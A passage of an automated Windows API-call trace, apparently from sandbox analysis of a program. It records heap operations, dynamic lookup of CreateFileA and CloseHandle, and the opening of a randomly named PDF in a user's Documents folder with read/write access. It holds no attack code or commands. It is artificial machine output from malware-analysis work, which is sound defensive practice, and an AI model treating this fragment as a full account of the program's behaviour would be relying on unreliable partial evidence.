dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c988 [0035.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c988, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.608] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0035.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0035.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0035.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.608] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0035.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.608] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0035.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf", cchWideChar=97, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 97 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x61) returned 0x7c10a8 [0035.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf", cchWideChar=97, lpMultiByteStr=0x7c10a8, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf", lpUsedDefaultChar=0x0) returned 97 [0035.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0035.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.609] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.609] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jrhg4bbw8x\\lckicvhsnu_6z.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.609] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc2) returned 0x7c5448 [0035.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=97, lpWideCharStr=0x7c5448, cchWideChar=97 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\jrHG4BBW8X\\LCKIcVhsNU_6Z.pdf") returned 97 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791268 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.610] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0035.610] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0035.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0035.611] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0035.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.613] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0035.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0035.613] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0035.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0035.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.614] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.615] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899b8 [0035.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8899b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.615] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0035.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0035.615] CloseHandle (hObject=0x128) returned 1 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0035.615] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.615] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 